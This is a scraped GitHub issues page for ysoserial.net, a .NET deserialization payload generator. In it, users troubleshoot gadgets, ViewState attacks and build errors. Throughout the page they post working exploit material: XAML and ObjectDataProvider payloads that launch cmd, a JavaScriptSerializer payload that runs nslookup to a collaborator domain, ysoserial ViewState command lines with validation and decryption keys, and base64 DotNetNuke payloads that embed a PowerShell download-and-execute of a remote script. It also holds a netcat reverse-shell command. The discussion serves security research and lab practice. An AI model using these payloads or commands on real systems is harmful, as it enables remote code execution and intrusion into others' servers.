pwntester / ysoserial.net Goto Github PK
View Code? Open in Web Editor NEWDeserialization payload generator for a variety of .NET formatters
License: MIT License
Deserialization payload generator for a variety of .NET formatters
License: MIT License
Hello
I'm trying to research vulnerability inside our Azure samples, coming out of BinaryFormatter.
The latest release of the tool doesn't contain ClaimsPrincipal gadget, so I had to clone and build the code.
Immediately after the build .exe file is deleted by Windows Security with next action message:
Hi,
I'm looking for a gadget that can be used for the DataContractJsonSerializer Serializer.
If there is any, I can test it and include it into the tool.
Thanks,
Gerardo
I think the command argument ("C|command="
) should be in lowercase ("c|command="
) for /ysoserial/Plugins/DotNetNukePlugin.cs
to match the rest of the tool.
Hello,
I'm training on deserialization and I'm currently on .NET, so already thank you for this tool and your conferences, it helped me a lot.
After having created a simple lab with a deserialization in a viewstate (MAC not enabled / Viewstate not encrypted), I wonder if it is possible to block the execution of the thread in cases where an out of band detection is not possible ?
For example, if I generate the payload with the following command, the output will be written to the specified file.
.\ysoserial.exe -o base64 -g TypeConfuseDelegate -f LosFormatter -c "echo 1234 > C:/Windows/temp/exploit.txt"
I can also have a DNS request with the following payload
.\ysoserial.exe -o base64 -g TypeConfuseDelegate -f LosFormatter -c "ping my.server.tld -n 10"
But if I do a sleep, the command will be transparent because it is executed in a thread, is it possible to block the thread ? or to do otherwise ? (for example modify the gadget ?)
Regards
Hi there,
I have this .NET code
XmlSerializer xmlSerializer = new XmlSerializer(typeof(String), "http://web.com/a");
XmlTextReader xmlReader = new XmlTextReader(stream)
{
WhitespaceHandling = WhitespaceHandling.None
};
String s = xmlSerializer.Deserialize(xmlReader) as String;
I generated this XML PoC
<?xml version="1.0"?>
<root xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" type="System.Data.Services.Internal.ExpandedWrapper`2[[System.Windows.Markup.XamlReader, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089">
<ExpandedWrapperOfXamlReaderObjectDataProvider>
<ExpandedElement/>
<ProjectedProperty0>
<MethodName>Parse</MethodName>
<MethodParameters>
<anyType xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xsi:type="xsd:string">
<ResourceDictionary xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" xmlns:System="clr-namespace:System;assembly=mscorlib" xmlns:Diag="clr-namespace:System.Diagnostics;assembly=system">
<ObjectDataProvider x:Key="LaunchCmd" ObjectType="{x:Type Diag:Process}" MethodName="Start">
<ObjectDataProvider.MethodParameters>
<System:String>cmd</System:String>
<System:String>/c calc</System:String>
</ObjectDataProvider.MethodParameters>
</ObjectDataProvider>
</ResourceDictionary>
</anyType>
</MethodParameters>
<ObjectInstance xsi:type="XamlReader"></ObjectInstance>
</ProjectedProperty0>
</ExpandedWrapperOfXamlReaderObjectDataProvider>
</root>
during deserialization I'm getting this error
Unhandled Exception: System.InvalidOperationException: There is an error in XML document (2, 2). ---> System.InvalidOperationException: <root xmlns=''> was not expected.
at Microsoft.Xml.Serialization.GeneratedAssembly.XmlSerializationReaderString.Read1_string()
--- End of inner exception stack trace ---
at System.Xml.Serialization.XmlSerializer.Deserialize(XmlReader xmlReader, String encodingStyle, XmlDeserializationEvents events)
at System.Xml.Serialization.XmlSerializer.Deserialize(XmlReader xmlReader)
at ysoserial.Program.Main(String[] args) in C:\Users\vava\Desktop\hacktools\ysoserial.net-master\ysoserial\Program.cs:line 27
could you help me, how can I fix it? why am I getting this error?
NetVersion: 4.7.03062
<machineKey compatibilityMode="Framework45" decryptionKey="AutoGenerate,IsolateApps" validationKey="AutoGenerate,IsolateApps" />
ysoserial.exe -p ViewState -g ActivitySurrogateSelectorFromFile -c "test.cs;System.dll;System.IO.dll;System.Web.dll" --validationalg="HMACSHA256" --validationkey="9E23971A70539C4C5D1EFE2FACD22B03C2BCE8414D6FB1D1308F5A47C839808EC7C8156654AB8FB14CB643B7954C3956191C7690F0F4EF5104C1E93EA3540871" --decryptionalg="Auto" --decryptionkey="9E23971A87F9ED201A833CDEBAF01C9C7DFF2A72B6E1D087" --apppath="/owa" --path="/owa/auth/logon.aspx" --islegacy --isdebug > test.txt
The response is always 200
Although it is written in whitepaper that in DataContractSerializer
case it is enough to control the expected type only, the trick with ExpandedWrapper
to include the Process
into the object's graph doesn't work in the example below:
<?xml version="1.0"?>
<root xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<item type="System.Data.Services.Internal.ExpandedWrapper`2[[System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089">
<ExpandedWrapperOfProcessObjectDataProviderpaO_SOqJL xmlns="http://schemas.datacontract.org/2004/07/System.Data.Services.Internal" xmlns:i="http://www.w3.org/2001/XMLSchema-instance">
<ExpandedElement i:nil="true" xmlns:a="http://schemas.datacontract.org/2004/07/System.Diagnostics"/>
<ProjectedProperty0 xmlns:a="http://schemas.datacontract.org/2004/07/System.Windows.Data">
<a:MethodName>Start</a:MethodName>
<a:MethodParameters xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays">
<b:anyType i:type="c:string" xmlns:c="http://www.w3.org/2001/XMLSchema">calc</b:anyType>
</a:MethodParameters>
<a:ObjectInstance i:type="b:Process" xmlns:b="http://schemas.datacontract.org/2004/07/System.Diagnostics">
<__identity i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System"/>
</a:ObjectInstance>
</ProjectedProperty0>
</ExpandedWrapperOfProcessObjectDataProviderpaO_SOqJL>
</item>
</root>
It works only if typeof(Process)
is passed as a knownType
var xmlDoc = new XmlDocument();
xmlDoc.Load("testdeser.xml");
foreach (XmlElement xmlItem in xmlDoc.SelectNodes("root/item"))
{
string typeName = xmlItem.GetAttribute("type");
var s = new DataContractSerializer(Type.GetType(typeName), new[] { typeof(Process) });
var reader = new XmlTextReader(new StringReader(xmlItem.InnerXml));
var a = s.ReadObject(reader);
}
Hello,
I have an error executing a PSObject payload (ASP.NET Core Runtime 2.1.23). Does it means I have to bypass loadFromRemoteSources restrictions on the target too?
ysoserial.exe -f BinaryFormatter -g PSObject -o base64 -c "ping 10.0.0.1" -t
Unhandled Exception: System.NotSupportedException: An attempt was made to load an assembly from a network location which would have caused the assembly to be sandboxed in previous versions of the .NET Framework. This release of the .NET Framework does not enable CAS policy by default, so this load may be dangerous. If this load is not intended to sandbox the assembly, please enable the loadFromRemoteSources switch. See http://go.microsoft.com/fwlink/?LinkId=155569 for more information.
at System.Reflection.RuntimeAssembly.nLoadFile(String path, Evidence evidence)
at System.Reflection.Assembly.LoadFile(String path)
at ysoserial.Generators.PSObjectGenerator.Generate(String formatter, InputArgs inputArgs) in D:\a\ysoserial.net\ysoserial.net\ysoserial\Generators\PSObjectGenerator.cs:line 67
at ysoserial.Generators.GenericGenerator.GenerateWithInit(String formatter, InputArgs inputArgs) in D:\a\ysoserial.net\ysoserial.net\ysoserial\Generators\GenericGenerator.cs:line 68
at ysoserial.Program.Main(String[] args) in D:\a\ysoserial.net\ysoserial.net\ysoserial\Program.cs:line 197
Is this used within viewgen?
Testing payload mode run_command did not work on a fresh install of DotNetNuke 07.03.04. I will submit a PR with a fix.
Hi,
im having a question here instead of an issue.
im currently trying to exploit a potential Deserialisation vulnerability in a webapplication which is using JavascriptObjectDeserializer. I tried to exploit the vulnerability with the given JavascriptObjectDeserialize payload given here:
_{
'__type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35',
'MethodName':'Start',
'ObjectInstance':{
'__type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
'StartInfo': {
'__type':'System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
'FileName':'cmd',
'Arguments':'/c nslookup collaborator.somedomain.com'
}
}
}_
The Web application throws the following error:
_{"Message":"The operation is invalid due to the current state of the object.","StackTrace":" bei System.Web.Script.Serialization.ObjectConverter.ConvertDictionaryToObject(IDictionary`2 dictionary, Type type, JavaScriptSerializer serializer, Boolean throwOnError, Object\u0026 convertedObject)\r\n bei System.Web.Script.Serialization.ObjectConverter.ConvertObjectToTypeInternal(Object o, Type type, JavaScriptSerializer serializer, Boolean throwOnError, Object\u0026 convertedObject)\r\n bei System.Web.Script.Serialization.ObjectConverter.ConvertObjectToTypeMain(Object o, Type type, JavaScriptSerializer serializer, Boolean throwOnError, Object\u0026 convertedObject)\r\n bei System.Web.Script.Serialization.ObjectConverter.ConvertObjectToType(Object o, Type type, JavaScriptSerializer serializer)\r\n at System.Web.Script.Serialization.JavaScriptObjectDeserializer.DeserializeInternal(Int32 depth)\r\n bei System.Web.Script.Serialization.JavaScriptObjectDeserializer.DeserializeDictionary(Int32 depth)\r\n bei System.Web.Script.Serialization.JavaScriptObjectDeserializer.DeserializeInternal(Int32 depth)\r\n bei System.Web.Script.Serialization.JavaScriptObjectDeserializer.DeserializeDictionary(Int32 depth)\r\n bei System.Web.Script.Serialization.JavaScriptObjectDeserializer.DeserializeInternal(Int32 depth)\r\n bei System.Web.Script.Serialization.JavaScriptObjectDeserializer.BasicDeserialize(String input, Int32 depthLimit, JavaScriptSerializer serializer)\r\n bei System.Web.Script.Serialization.JavaScriptSerializer.Deserialize[T](String input)\r\n bei System.Web.Script.Services.RestHandler.ExecuteWebServiceCall(HttpContext context, WebServiceMethodData methodData)","ExceptionType":"System.InvalidOperationException"}_
No DNS-Lookup was executed here. Im just learning how to exploit deserialisation vulnerabilities but from my previous research, i estimate that the application no longer accepts the Object System.Windows.Data.ObjectDataProvider because it has been patched. Do I assume this correctly or should an RCE always be possible if the deserialization fails with an error message?
Unfortunately, I don't have access to source code (black box).
Thank you for your answers.
Greetings
It appears that Forshaw's SurrogateSelector gadget has been fixed in newer versions of DotNet. The patch notes are here for reference. I have yet to dig into exactly what has been corrected, but my guess would be some sort of type filtering to prevent the serialization of arbitrary objects.
Attempting to generate a payload on a host with 4.8 installed will produce the following error:
ysoserial.exe -g ActivitySurrogateSelector -f BinaryFormatter -o base64 -c none --test
Unhandled Exception: System.ArgumentException: obj
at System.Workflow.ComponentModel.Serialization.ActivitySurrogateSelector.ObjectSurrogate.GetObjectData(Object obj, SerializationInfo info, StreamingContext context)
at System.Runtime.Serialization.Formatters.Binary.WriteObjectInfo.InitSerialize(Object obj, ISurrogateSelector surrogateSelector, StreamingContext context, SerObjectInfoInit serObjectInfoInit, IFormatterConverter converter, ObjectWriter objectWriter, SerializationBinder binder)
at System.Runtime.Serialization.Formatters.Binary.WriteObjectInfo.Serialize(Object obj, ISurrogateSelector surrogateSelector, StreamingContext context, SerObjectInfoInit serObjectInfoInit, IFormatterConverter converter, ObjectWriter objectWriter, SerializationBinder binder)
at System.Runtime.Serialization.Formatters.Binary.ObjectWriter.Serialize(Object graph, Header[] inHeaders, __BinaryWriter serWriter, Boolean fCheck)
at System.Runtime.Serialization.Formatters.Binary.BinaryFormatter.Serialize(Stream serializationStream, Object graph, Header[] headers, Boolean fCheck)
at System.Runtime.Serialization.Formatters.Binary.BinaryFormatter.Serialize(Stream serializationStream, Object graph)
at ysoserial.Generators.PayloadClass.GetObjectData(SerializationInfo info, StreamingContext context) in C:\ysoserial.net\ysoserial\Generators\ActivitySurrogateSelectorGenerator.cs:line 117
at System.Runtime.Serialization.Formatters.Binary.WriteObjectInfo.InitSerialize(Object obj, ISurrogateSelector surrogateSelector, StreamingContext context, SerObjectInfoInit serObjectInfoInit, IFormatterConverter converter, ObjectWriter objectWriter, SerializationBinder binder)
at System.Runtime.Serialization.Formatters.Binary.WriteObjectInfo.Serialize(Object obj, ISurrogateSelector surrogateSelector, StreamingContext context, SerObjectInfoInit serObjectInfoInit, IFormatterConverter converter, ObjectWriter objectWriter, SerializationBinder binder)
at System.Runtime.Serialization.Formatters.Binary.ObjectWriter.Serialize(Object graph, Header[] inHeaders, __BinaryWriter serWriter, Boolean fCheck)
at System.Runtime.Serialization.Formatters.Binary.BinaryFormatter.Serialize(Stream serializationStream, Object graph, Header[] headers, Boolean fCheck)
at System.Runtime.Serialization.Formatters.Binary.BinaryFormatter.Serialize(Stream serializationStream, Object graph)
at ysoserial.Generators.GenericGenerator.Serialize(Object cmdobj, String formatter, Boolean test) in C:\ysoserial.net\ysoserial\Generators\GenericGenerator.cs:line 37
at ysoserial.Generators.ActivitySurrogateSelectorGenerator.Generate(String cmd, String formatter, Boolean test) in C:\ysoserial.net\ysoserial\Generators\ActivitySurrogateSelectorGenerator.cs:line 143
at ysoserial.Program.Main(String[] args) in C:\ysoserial.net\ysoserial\Program.cs:line 135
Would the preferred "fix" simply be a note in the help text for the time being?
I tried to build the ysoserial solution but it throwing the errors:
The type or namespace name 'NDesk' could not be found (are you missing a using directive or an assembly reference?)
The type or namespace name 'OptionSet' could not be found (are you missing a using directive or an assembly reference?)
I already installed .Net Framework 4.5.2, tried to rebuild the solution but did not help, what could I miss? Thanks a lot
To make ysoserial accessible in multiple platforms (mac, linux, windows), containerizing the code is a good solution. Once it's here, adding it on docker registry can ease the installation processes. The user would only have to pull the image and run it regardless of what is his OS.
https://puppet.com/docs/pipelines-for-apps/enterprise/docker-c-sharp.html
https://docs.docker.com/engine/examples/dotnetcore/
I am facing an issue with the downloaded pre-compiled executable (1.32 latest release).
When I try to run the executable, it gives a permission denied error like -
-bash: ./ysoserial.exe: Permission denied
I am running it through Cygwin.
Hi,
I noticed that in using a command like, ysoserial.exe -p DotNetNuke -m run_command -c "powershell.exe iex (New-Object Net.WebClient).DownloadString('https://example.com/helloWorld.ps1')"_ produces a slightly longer output in version 1.32 than 1.34. Along with this, the output from the newer version didn't succeed in executing, but version 1.32 did. The difference in length looks like it is inside of the "anytype" tags.
The outputs are the following:
1.32:
<profile><item key="key" type="System.Data.Services.Internal.ExpandedWrapper
2[[System.Web.UI.ObjectStateFormatter, System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089">Deserialize/wEylxIAAQAAAP////8BAAAAAAAAAAwCAAAASVN5c3RlbSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAAIQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuU29ydGVkU2V0YDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAVDb3VudAhDb21wYXJlcgdWZXJzaW9uBUl0ZW1zAAMABgiNAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkNvbXBhcmlzb25Db21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQgCAAAAAgAAAAkDAAAAAgAAAAkEAAAABAMAAACNAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkNvbXBhcmlzb25Db21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQEAAAALX2NvbXBhcmlzb24DIlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIJBQAAABEEAAAAAgAAAAYGAAAAU2lleCAoTmV3LU9iamVjdCBOZXQuV2ViQ2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cHM6Ly9leGFtcGxlLmNvbS9oZWxsb1dvcmxkLnBzMScpBgcAAAAOcG93ZXJzaGVsbC5leGUEBQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQdtZXRob2QwB21ldGhvZDEDAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5L1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyCQgAAAAJCQAAAAkKAAAABAgAAAAwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BwAAAAR0eXBlCGFzc2VtYmx5BnRhcmdldBJ0YXJnZXRUeXBlQXNzZW1ibHkOdGFyZ2V0VHlwZU5hbWUKbWV0aG9kTmFtZQ1kZWxlZ2F0ZUVudHJ5AQECAQEBAzBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkGCwAAALACU3lzdGVtLkZ1bmNgM1tbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MsIFN5c3RlbSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQYMAAAAS21zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OQoGDQAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5Bg4AAAAaU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MGDwAAAAVTdGFydAkQAAAABAkAAAAvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIHAAAABE5hbWUMQXNzZW1ibHlOYW1lCUNsYXNzTmFtZQlTaWduYXR1cmUKU2lnbmF0dXJlMgpNZW1iZXJUeXBlEEdlbmVyaWNBcmd1bWVudHMBAQEBAQADCA1TeXN0ZW0uVHlwZVtdCQ8AAAAJDQAAAAkOAAAABhQAAAA+U3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MgU3RhcnQoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGFQAAAD5TeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcyBTdGFydChTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKAQoAAAAJAAAABhYAAAAHQ29tcGFyZQkMAAAABhgAAAANU3lzdGVtLlN0cmluZwYZAAAAK0ludDMyIENvbXBhcmUoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGGgAAADJTeXN0ZW0uSW50MzIgQ29tcGFyZShTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKARAAAAAIAAAABhsAAABxU3lzdGVtLkNvbXBhcmlzb25gMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JDAAAAAoJDAAAAAkYAAAACRYAAAAKCw==`
1.34:
<profile><item key="key" type="System.Data.Services.Internal.ExpandedWrapper
2[[System.Web.UI.ObjectStateFormatter, System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089">Deserialize/wEy7gcAAQAAAP////8BAAAAAAAAAAwCAAAAXk1pY3Jvc29mdC5Qb3dlclNoZWxsLkVkaXRvciwgVmVyc2lvbj0zLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzUFAQAAAEJNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLlRleHQuRm9ybWF0dGluZy5UZXh0Rm9ybWF0dGluZ1J1blByb3BlcnRpZXMBAAAAD0ZvcmVncm91bmRCcnVzaAECAAAABgMAAACQBjw/eG1sIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9InV0Zi04Ij8+DQo8T2JqZWN0RGF0YVByb3ZpZGVyIE1ldGhvZE5hbWU9IlN0YXJ0IiBJc0luaXRpYWxMb2FkRW5hYmxlZD0iRmFsc2UiIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dpbmZ4LzIwMDYveGFtbC9wcmVzZW50YXRpb24iIHhtbG5zOnNkPSJjbHItbmFtZXNwYWNlOlN5c3RlbS5EaWFnbm9zdGljczthc3NlbWJseT1TeXN0ZW0iIHhtbG5zOng9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sIj4NCiAgPE9iamVjdERhdGFQcm92aWRlci5PYmplY3RJbnN0YW5jZT4NCiAgICA8c2Q6UHJvY2Vzcz4NCiAgICAgIDxzZDpQcm9jZXNzLlN0YXJ0SW5mbz4NCiAgICAgICAgPHNkOlByb2Nlc3NTdGFydEluZm8gQXJndW1lbnRzPSIvYyBwb3dlcnNoZWxsLmV4ZSBpZXggKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHBzOi8vZXhhbXBsZS5jb20vaGVsbG9Xb3JsZC5wczEnKSIgU3RhbmRhcmRFcnJvckVuY29kaW5nPSJ7eDpOdWxsfSIgU3RhbmRhcmRPdXRwdXRFbmNvZGluZz0ie3g6TnVsbH0iIFVzZXJOYW1lPSIiIFBhc3N3b3JkPSJ7eDpOdWxsfSIgRG9tYWluPSIiIExvYWRVc2VyUHJvZmlsZT0iRmFsc2UiIEZpbGVOYW1lPSJjbWQiIC8+DQogICAgICA8L3NkOlByb2Nlc3MuU3RhcnRJbmZvPg0KICAgIDwvc2Q6UHJvY2Vzcz4NCiAgPC9PYmplY3REYXRhUHJvdmlkZXIuT2JqZWN0SW5zdGFuY2U+DQo8L09iamVjdERhdGFQcm92aWRlcj4L`
Hello,
I'm trying the code execution vulnerability in a lab environment where the validation key and decryption keys are known. Unfortunately, I cannot get it to work no matter what I try.
I'm using .NET 4.0.
I've tried both by setting the ViewStateGenerator and through setting the app path (and I confirm that the ViewStateGenerator value is correct). I have also tried appending ='s at the end of the generated code. I've also tried URL encoding the generated viewstate that I send through the POST request.
Nothing works. I can't even get a single echo 123 > c:\windows\temp\test.txt
working. What am I doing wrong?
(I know it should throw a 500 exception, but it should also create test.txt which it doesn't)
Here are some of the codes I have tried:
ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "echo 123 > c:\windows\temp\test.txt" --apppath="/p" --path="/p/default.aspx" --islegacy --validationalg="SHA1" --validationkey="1CAD8CD7D5084010C7AC86E09C048DF2E6351D8E1458173BD2F60C948FDCFC79474E7C4BFB8053B3D599D564C3F8F16CD36D4BFF85DC2B86964E110CAB5529B5" --isdebug
Also tried with giving both keys:
ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "echo 123 > c:\windows\temp\test.txt" --path="/p/default.aspx" --apppath="/p" --decryptionalg="Auto" --decryptionkey="9419E035D0FF7D8038D0DA7A21AFB4482C82E939147FB1C1B1F7EBCDDC69B617" --validationalg="SHA1" --validationkey="1CAD8CD7D5084010C7AC86E09C048DF2E6351D8E1458173BD2F60C948FDCFC79474E7C4BFB8053B3D599D564C3F8F16CD36D4BFF85DC2B86964E110CAB5529B5"
The generator code for the above path is 333BF894
Thanks!
Quickly tried to make a sample vulnerable .NET Core 2.1 app. It looks like none of the gadget works on .net core :( but maybe I missed something.
i got this error message
033102051731: The given key was not present in the dictionary.
at System.ThrowHelper.ThrowKeyNotFoundException()
at System.Collections.Generic.Dictionary`2.get_Item(TKey key)
at Service.Common.Login(String plainText)
my commad
ysoserial.exe -f JavaScriptSerializer -g ObjectDataProvider -o raw -c "calc" -t
ysoserial.exe -f Json.Net -g ObjectDataProvider -o raw -c "calc" -t
and the client send this param to server
{"username":"test","password":"test","deviceId":"698c7e","key":"716cbce586913b54"}
key was the aes key for encryption
am i missing something? or what's wrong with this method? i'm a beginner on asp and json deserialize
thanks
Hi.
Any idea why the typeconfusedelegatemono doesn't work for me?
I built the supersimple example from https://www.monodevelop.com/documentation/creating-aspnet-projects/ and I run it in xsp4, but the viewstate - which should be MAC enabled but not encrypted, .net 4.0 version, looks weird and the payload generated by ysoserial.net - which is much longer - does not work. I'm using a specific validationkey in web.config for testing.
%2FwEMDAwQAgAADgEMBQMMEAIAAA4BDAUBDBACDA8BAQRUZXh0AQ5Zb3UgY2xpY2tlZCBtZQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALvN0281sXomxFcIhy33ycX5EfZiafqaB78GIBHdjmVX
Mono Version Information: 6.10.0.104 (tarball Fri Jun 26 19:38:24 UTC 2020); ASP.NET Version: 4.0.30319.42000
Payload generated with:
./ysoserial.exe -p ViewState -g TypeConfuseDelegateMono -c "nc 127.0.0.1 555 -e /bin/bash" --path="/Default.aspx" --apppath="/" --islegacy --validationalg="SHA1" --validationkey="xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx" --isdebug
Tried to make a sample vulnerable .NET Core 3.0 app. It looks like none of the gadget works on .net core.
Got following error message when I used gadgets created by Oleksandr Mirosh, [As per your one of comments on previous similar issue raised by some user].
System.Runtime.Serialization.SerializationException: Unable to find assembly 'Microsoft.PowerShell.Editor, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35'.
at System.Runtime.Serialization.Formatters.Binary.BinaryAssemblyInfo.GetAssembly()
at System.Runtime.Serialization.Formatters.Binary.ObjectReader.GetType(BinaryAssemblyInfo assemblyInfo, String name)
at System.Runtime.Serialization.Formatters.Binary.ObjectMap..ctor(String objectName, String[] memberNames, BinaryTypeEnum[] binaryTypeEnumA, Object[] typeInformationA, Int32[] memberAssemIds, ObjectReader objectReader, Int32 objectId, BinaryAssemblyInfo assemblyInfo, SizedArray assemIdToAssemblyTable)
at System.Runtime.Serialization.Formatters.Binary.BinaryParser.ReadObjectWithMapTyped(BinaryObjectWithMapTyped record)
at System.Runtime.Serialization.Formatters.Binary.BinaryParser.ReadObjectWithMapTyped(BinaryHeaderEnum binaryHeaderEnum)
at System.Runtime.Serialization.Formatters.Binary.BinaryParser.Run()
at System.Runtime.Serialization.Formatters.Binary.ObjectReader.Deserialize(BinaryParser serParser, Boolean fCheck)
at System.Runtime.Serialization.Formatters.Binary.BinaryFormatter.Deserialize(Stream serializationStream, Boolean check)
at System.Runtime.Serialization.Formatters.Binary.BinaryFormatter.Deserialize(Stream serializationStream)
at DatingApp.API.Controllers.DeserializationController.Deserialize(Info value2) in D:\DeserializationController.cs:line 73
at lambda_method(Closure , Object , Object[] )
at Microsoft.Extensions.Internal.ObjectMethodExecutor.Execute(Object target, Object[] parameters)
at Microsoft.AspNetCore.Mvc.Infrastructure.ActionMethodExecutor.SyncActionResultExecutor.Execute(IActionResultTypeMapper mapper, ObjectMethodExecutor executor, Object controller, Object[] arguments)
at Microsoft.AspNetCore.Mvc.Infrastructure.ControllerActionInvoker.InvokeActionMethodAsync()
at Microsoft.AspNetCore.Mvc.Infrastructure.ControllerActionInvoker.Next(State& next, Scope& scope, Object& state, Boolean& isCompleted)
at Microsoft.AspNetCore.Mvc.Infrastructure.ControllerActionInvoker.InvokeNextActionFilterAsync()
